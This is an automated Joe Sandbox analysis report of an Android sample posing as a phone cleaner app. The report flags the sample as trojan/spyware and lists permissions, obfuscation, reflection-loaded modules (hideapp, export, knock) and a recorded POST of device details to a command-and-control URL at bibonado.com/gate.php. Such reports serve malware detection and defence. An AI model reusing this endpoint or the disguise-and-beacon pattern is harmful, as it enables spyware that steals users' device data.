Analysis Report A3FUUtB5Kb

Overview

General Information

Joe Sandbox Version: 24.0.0
Analysis ID: 694431
Start date: 26.10.2018
Start time: 21:02:57
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 11m 51s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: A3FUUtB5Kb
Cookbook file name: defaultandroidfilecookbook.jbs
Analysis system description: Android x86 6.0 EEE PC
Detection: MAL
Classification: mal60.troj.spyw.evad.and@0/256@2/0
Warnings:
  • Not all executed log events are in report (maximum 10 identical API calls)
  • Not all resource files were parsed
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size exceeded maximum capacity and may have missing dynamic data code.

Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 60 | 0 - 100 | Report FP / FN | malicious

Classification

Signature Overview

Location Tracing:

Queries the phones location (GPS)
Source: com.google.android.gms.internal.zzhe;->zza:306API Call: android.location.Location.getLatitude
Source: com.google.android.gms.internal.zzhe;->zza:308API Call: android.location.Location.getLongitude

Spreading:

Has permission to change the WIFI configuration including connecting and disconnecting
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_STATE
Accesses external storage location
Source: com.google.android.gms.internal.zzbl;->zzdn:5API Call: android.os.Environment.getExternalStorageState
Source: com.google.android.gms.internal.zzbv;-><init>:12API Call: android.os.Environment.getExternalStorageDirectory

Networking:

Checks an internet connection is available
Source: com.google.android.gms.internal.zzhj$zza;-><init>:4API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzhj$zza;->zza:75API Call: android.net.NetworkInfo.getDetailedState
Source: com.google.android.gms.internal.zzhj$zza;->zza:73API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.analytics.internal.zzag;->zzlB:58API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.analytics.internal.zzag;->zzlB:59API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.analytics.internal.zzah;->zzlB:337API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.analytics.internal.zzah;->zzlB:338API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.measurement.internal.zzq;->zzlB:59API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.measurement.internal.zzq;->zzlB:60API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.tagmanager.zzcl;->zzGX:13API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.tagmanager.zzcl;->zzGX:14API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.tagmanager.zzcx;->zzGw:72API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.tagmanager.zzcx;->zzGw:73API Call: android.net.NetworkInfo.isConnected
Source: mobile.cleaner.battery.heath.cleanmaster.utils.Utils;->isNetworkOnline:61API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Connects to IPs without corresponding DNS lookups
Opens an internet connection
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: java.net.URL.openConnection("http://bibonado.com/gate.php")
Source: xxxxxx.zzzzzz.glue.network;->SENDPOST:15API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.analytics.internal.zzah;->zzc:314API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzdg;->zza:43API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzdm$zza;->zzbr:22API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzdu;->zzU:97API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzhd;->zza:158API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zziy;->zzbr:12API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzru;->zzgJ:18API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzz;->zza:68API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.measurement.internal.zzq;->zzc:40API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.tagmanager.zzcx$1;->zzd:2API Call: java.net.URL.openConnection (not executed)
Performs DNS lookups (Java API)
Source: com.google.android.gms.cast.CastDevice;-><init>:10API Call: java.net.InetAddress.getByName (not executed)
Found strings which match to known social media urls
Source: androidString found in binary or memory: FACEBOOK equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: Facebook equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: Facebook logout error. equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: Must support either Facebook, Google or Email sign-in. equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: No supported Facebook SDK version found to use Facebook logout. equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.FacebookSdk equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.Session equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.Session$OpenRequest equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.Session$StatusCallback equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.SessionState equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.auth.login equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.katana equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.login.LoginManager equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: facebook equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: facebook.com equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Monitors network connection state
Source: com.google.android.gms.tagmanager.zzbl;->zzba:30API Call: android.content.IntentFilter.addAction android.net.conn.CONNECTIVITY_CHANGE
Performs DNS lookups
Source: unknownDNS traffic detected: queries for: bibonado.com
Posts data to webserver
Source: unknownHTTP traffic detected: POST /gate.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; VirtualBox Build/MOB31E)
  Host: bibonado.com
  Connection: Keep-Alive
  Accept-Encoding: gzip
  Content-Length: 394
Urls found in memory or binary data
Source: androidString found in binary or memory: http://bibonado.com
Source: androidString found in binary or memory: http://bibonado.com/gate.php
Source: androidString found in binary or memory: http://goo.gl/8Rd3yj
Source: androidString found in binary or memory: http://goo.gl/naFqQk
Source: androidString found in binary or memory: http://plus.google.com/
Source: androidString found in binary or memory: http://schemas.android.com/apk/lib/com.google.android.gms.plus
Source: abc_screen_toolbar.xml, activity_entry_fa.xml, activity_phone_booster.xmlString found in binary or memory: http://schemas.android.com/apk/res-auto
Source: abc_action_menu_layout.xmlString found in binary or memory: http://schemas.android.com/apk/res-auto((android.support.v7.widget.ActionMenuView
Source: abc_screen_toolbar.xmlString found in binary or memory: http://schemas.android.com/apk/res-auto00android.support.v7.widget.ActionBarOverlayLayout
Source: abc_screen_simple.xml, activity_clean_all_finish.xml, abc_switch_thumb_material.xml, design_snackbar_in.xmlString found in binary or memory: http://schemas.android.com/apk/res/android
Source: abc_dialog_title_material.xmlString found in binary or memory: http://schemas.android.com/apk/res/android00android.support.v7.widget.FitWindowsLinearLayout
Source: abc_screen_simple.xmlString found in binary or memory: http://schemas.android.com/apk/res/android00android.support.v7.widget.FitWindowsLinearLayout((androi
Source: design_navigation_item.xmlString found in binary or memory: http://schemas.android.com/apk/res/android66android.support.design.internal.NavigationMenuItemView
Source: androidString found in binary or memory: http://www.google-analytics.com
Source: androidString found in binary or memory: http://www.google.com
Source: androidString found in binary or memory: https://accounts.google.com
Source: androidString found in binary or memory: https://app-measurement.com/a
Source: androidString found in binary or memory: https://csi.gstatic.com/csi
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/favicon.ico
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_banner.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_expanded_banner.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_interstitial.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/production/sdk-core-v40-impl.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.html
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40.html
Source: androidString found in binary or memory: https://play.google.com/store/apps/details?id=
Source: androidString found in binary or memory: https://ssl.google-analytics.com
Source: androidString found in binary or memory: https://www.googleapis.com/auth/drive
Source: androidString found in binary or memory: https://www.googleapis.com/auth/drive.appdata
Source: androidString found in binary or memory: https://www.googleapis.com/auth/drive.apps
Source: androidString found in binary or memory: https://www.googleapis.com/auth/drive.file
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.activity.read
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.activity.write
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.body.read
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.body.write
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.location.read
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.location.write
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.nutrition.read
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.nutrition.write
Source: androidString found in binary or memory: https://www.googleapis.com/auth/games
Source: androidString found in binary or memory: https://www.googleapis.com/auth/games.firstparty
Source: androidString found in binary or memory: https://www.googleapis.com/auth/plus.login
Source: androidString found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: androidString found in binary or memory: https://www.googletagmanager.com
Uses HTTP for connecting to the internet
Source: com.google.android.gms.analytics.internal.zzah;->zza:26API Call: java.net.HttpURLConnection.connect
Source: com.google.android.gms.analytics.internal.zzah;->zzb:65API Call: java.net.HttpURLConnection.connect
Source: com.google.android.gms.analytics.internal.zzah;->zzb:104API Call: java.net.HttpURLConnection.connect
Source: com.google.android.gms.internal.zzw;->zza:62API Call: org.apache.http.client.HttpClient.execute
Source: com.google.android.gms.measurement.internal.zzq$zzc;->run:43API Call: java.net.HttpURLConnection.connect
Uses HTTPS
Source: unknownNetwork traffic detected: HTTP traffic on port 57500 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51649
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32913
Source: unknownNetwork traffic detected: HTTP traffic on port 46823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37452
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55218
Source: unknownNetwork traffic detected: HTTP traffic on port 42120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57500
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39802
Source: unknownNetwork traffic detected: HTTP traffic on port 39802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 32913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 39804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57880
Source: unknownNetwork traffic detected: HTTP traffic on port 37452 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51649 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46823
Source: unknownNetwork traffic detected: HTTP traffic on port 55218 -> 443

E-Banking Fraud:

Has permission to query the list of currently running applications
Source: submitted apkRequest permission: android.permission.GET_TASKS

Spam, unwanted Advertisements and Ransom Demands:

May dial phone number
Source: com.google.android.gms.internal.zzbl;->zzdj:16API Call: android.net.Uri.parse("tel:")
Loads advertisement
Source: androidString found in binary or memory: .doubleclick.net
Source: androidString found in binary or memory: //googleads.g.doubleclick.net/mads/static/mad/sdk/native/native_ads.html
Source: androidString found in binary or memory: ad.doubleclick.net
Source: androidString found in binary or memory: googleads.g.doubleclick.net
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/favicon.ico
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_banner.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_expanded_banner.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_interstitial.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/production/sdk-core-v40-impl.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.html
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40.html
Source: androidString found in binary or memory: loading resource: https://googleads.g.doubleclick.net/favicon.ico
Source: androidString found in binary or memory: loading resource: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/production/sdk-core-v40-impl.js
Source: androidString found in binary or memory: loading resource: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.html
Source: androidString found in binary or memory: loading resource: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.js

Operating System Destruction:

Kills background processes
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityBatteySaver;->clearApplicationData:40API Call: android.app.ActivityManager.killBackgroundProcesses
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityPhoneBooster;->clearApplicationData:40API Call: android.app.ActivityManager.killBackgroundProcesses
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityScanAll;->clearBatteySaver:52API Call: android.app.ActivityManager.killBackgroundProcesses
Lists and deletes files in the same context
Source: com.google.android.gms.internal.zzv;->zza:155API Calls in same method context: File.listFiles,File.delete
Source: com.google.android.gms.internal.zzdu;->zzeb:277API Calls in same method context: File.listFiles,File.delete

Change of System Appearance:

May access the Android keyguard (lock screen)
Source: androidString found in binary or memory: keyguard
Acquires a wake lock
Source: com.google.android.gms.internal.zzrp;->acquire:132API Call: android.os.PowerManager$WakeLock.acquire
Sets a repeating alarm
Source: mobile.cleaner.battery.heath.cleanmaster.HomeActivity;->getNotification:38API Call: android.app.AlarmManager.setRepeating
Source: mobile.cleaner.battery.heath.cleanmaster.WifiReceiverListener1;->onReceive:36API Call: android.app.AlarmManager.setRepeating

System Summary:

Executes native commands
Source: eptdz.jhxonwlp.zdmg.Hagi;->check_net_ads:9API Call: java.lang.Runtime.exec ("/system/bin/netstat -t")
Requests potentially dangerous permissions
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_STATE
Source: submitted apkRequest permission: android.permission.CLEAR_APP_CACHE
Source: submitted apkRequest permission: android.permission.GET_TASKS
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.USE_CREDENTIALS
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Source: submitted apkRequest permission: android.permission.WRITE_EXTERNAL_STORAGE
Classification label
Source: classification engineClassification label: mal60.troj.spyw.evad.and@0/256@2/0
Creates SQLiteDatabase table
Source: com.google.android.gms.analytics.internal.zzj$zza;->onOpen:102API Call: android.database.sqlite.SQLiteDatabase.execSQL
Reads shares settings
Source: com.google.android.gms.internal.zzip$8;->zzbr:8API Call: "content_url_hashes":
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:sdk_core_location": https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.html
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:sdk_csi_server": https://csi.gstatic.com/csi
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:sdk_core_experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:request_builder:singleton_webview_experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:sdk_use_dynamic_module_experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:block_autoclicks_experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:spam_app_context:experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:video_stream_cache:experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:app_index:experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:kitkat_interstitial_workaround:experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:interstitial_follow_url:experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:interstitial_ad_pool:experiment_id": null
Source: eptdz.jhxonwlp.zdmg.Tools;->readStringConfig:244API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzd;->get:43API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzd;->get:51API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzd;->zzi:138API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.flags.impl.zza$zza$1;->zzvt:7API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.flags.impl.zza$zzd$1;->zzkp:6API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.analytics.internal.zzai$zza;->zzlN:69API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.analytics.internal.zzai;->zzlJ:57API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.auth.api.signin.internal.zzq;->zzbS:96API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzbp$1;->zzb:6API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzdy;->restore:76API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzip$2;->zzbr:7API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzip$6;->zzbr:7API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzli;->zznU:156API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzt$zza;->zzCR:6API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzt$zzc;->zzlN:83API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzt;->zzAr:51API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzt;->zzCP:72API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzt;->zzCQ:77API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzt;->zziJ:136API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.tagmanager.zzax;->zzf:16API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.tagmanager.zzax;->zzm:27API Call: android.content.SharedPreferences.getString

Data Obfuscation:

Found very long method strings
Source: Lcom/google/android/gms/internal/zzal;->zzm(Landroid/content/Context;)VMethod string: kN6R7ba8fSNltfAoX2Ceus8q55zNLa8LSwmk5PtrKQxTOW4APLrgPj/XilQPRAsq6ghyhXY4SJ7iCRtuKZWvyeoJwHzVGD5zg0nv3Bs3tZBXdPxNVuAWsZC+SQXuph7fu1sTJ+5FVbVNVa4pWDIdb+rpEZw19frucbVGZARi4c0J3H9aL9fZzvRJmKAFfSbWlbBpxLSRZwdoJBGziCe51vLlp3fdeEe9liDv0gsVL1+Ayz+I0NbgCVegkKXTwnI Length: 6508
Source: Lcom/google/android/gms/common/zzd$zzd$2;->zzoL()[BMethod string: 0\u0082\u0004\u00a80\u0082\u0003\u0090\u00a0\u0003\u0002\u0001\u0002\u0002\t\u0000\u00d5\u0085\u00b8l}\u00d3N\u00f50\r\u0006\t*\u0086H\u0086\u00f7\r\u0001\u0001\u0004\u0005\u00000\u0081\u00941\u000b0\t\u0006\u0003U\u0004\u0006\u0013\u0002US1\u00130\u0011\ Length: 4395
Source: Lcom/google/android/gms/internal/zzar;->zzac()Ljava/lang/String;Method string: kN6R7ba8fSNltfAoX2Ceus8q55zNLa8LSwmk5PtrKQxTOW4APLrgPj/XilQPRAsq6ghyhXY4SJ7iCRtuKZWvyeoJwHzVGD5zg0nv3Bs3tZBXdPxNVuAWsZC+SQXuph7fu1sTJ+5FVbVNVa4pWDIdb+rpEZw19frucbVGZARi4c0J3H9aL9fZzvRJmKAFfSbWlbBpxLSRZwdoJBGziCe51vLlp3fdeEe9liDv0gsVL1+Ayz+I0NbgCVegkKXTwnI Length: 6508
Obfuscates method names
Source: A3FUUtB5KbTotal valid method names: 41%
Uses reflection
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@8ecece3
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: public boolean xxxxxx.zzzzzz.glue.ActivityModuleStart.need_activity(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@7f201f8
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.cron(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: android.app.ReceiverRestrictedContext@414d75
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: null
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: {}
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: null
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: android.app.SharedPreferencesImpl@ae5d928
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: [{"type":"get","id":"35e0ad83-665b-4c69-a323-9bf8865acbf7","info":"v: 1, imei:0, country:, cell:, android:4.2.1, model:Galaxy Nexus, phonenumber:, sim:, showads:0, showadsfail:0, referrer:, pkg:ghl.phoneboost.com, uid:1, ver:0.1.6, lang:en, model:Galaxy Nexus, android:23, x: 000000000001"}]
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: http://bibonado.com/gate.php
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: http://bibonado.com/gate.php
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@b1005e9
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.knock(android.content.Context,android.content.Intent)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@b152f07
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.hideapp(android.content.Context,android.content.Intent)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: android.app.ApplicationPackageManager@e0fd94
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: android.app.SharedPreferencesImpl@ae5d928
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@dfcd0cd
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.export(android.content.Context,android.content.Intent)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: Intent { act=android.intent.action.MAIN flg=0x10000000 cmp=ghl.phoneboost.com/eptdz.jhxonwlp.zdmg.Oszcg }
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@d70094
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: public boolean xxxxxx.zzzzzz.glue.ActivityModuleStart.need_activity(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@e19ce2c
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.export(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzV:20API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzV:20API Call: Real call: public static java.lang.Long com.google.android.ads.zxxz.e.a()
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: public boolean xxxxxx.zzzzzz.glue.ActivityModuleStart.need_activity(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzc:273API Call: Real call: public static java.lang.String com.google.android.ads.zxxz.i.a()
Source: com.google.android.ads.zxxz.j;->a:9API Call: Real call: Display id 0: DisplayInfo{"Built-in Screen", uniqueId "local:0", app 768 x 976, real 768 x 1024, largest app 1024 x 952, smallest app 768 x 696, mode 1, defaultMode 1, modes [{id=1, width=1024, height=768, fps=65.465}], colorTransformId 1, defaultColorTransformId 1, supportedColorTransforms [{id=1, colorTransform=0}], rotation 3, density 160 (159.5681 x 159.89508) dpi, layerStack 0, appVsyncOff 0, presDeadline 16275338, type BUILT_IN, state ON, FLAG_SECURE, FLAG_SUPPORTS_PROTECTED_BUFFERS}, DisplayMetrics{density=1.0, width=768, height=976, scaledDensity=1.0, xdpi=159.5681, ydpi=159.89508}, isValid=true
Source: com.google.android.ads.zxxz.j;->a:9API Call: Real call: public void android.view.Display.getRealMetrics(android.util.DisplayMetrics)
Source: com.google.android.gms.internal.zzal;->zzi:125API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzi:125API Call: Real call: public static java.util.ArrayList com.google.android.ads.zxxz.j.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzX:32API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzX:32API Call: Real call: public static java.lang.Long com.google.android.ads.zxxz.l.a()
Source: com.google.android.ads.zxxz.g;->a:4API Call: Real call: mobile.cleaner.battery.heath.cleanmaster.HomeActivity@6ba118
Source: com.google.android.ads.zxxz.g;->a:4API Call: Real call: public abstract java.lang.String android.content.Context.getPackageResourcePath()
Source: com.google.android.gms.internal.zzal;->zza:40API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zza:40API Call: Real call: public static java.nio.ByteBuffer com.google.android.ads.zxxz.g.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzb:88API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzb:88API Call: Real call: public static java.nio.ByteBuffer com.google.android.ads.zxxz.k.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzj:133API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzj:133API Call: Real call: public static [I com.google.android.ads.zxxz.d.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzk:139API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzk:139API Call: Real call: public static int com.google.android.ads.zxxz.h.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzl:146API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzl:146API Call: Real call: public static int com.google.android.ads.zxxz.a.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzg:113API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzg:113API Call: Real call: public static java.lang.String com.google.android.ads.zxxz.c.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzh:119API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzh:119API Call: Real call: public static java.lang.Long com.google.android.ads.zxxz.b.a(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.cron(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.knock(android.content.Context,android.content.Intent)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: public boolean xxxxxx.zzzzzz.glue.ActivityModuleStart.need_activity(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.cron(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.knock(android.content.Context,android.content.Intent)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: public boolean xxxxxx.zzzzzz.glue.ActivityModuleStart.need_activity(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.cron(android.content.Context)
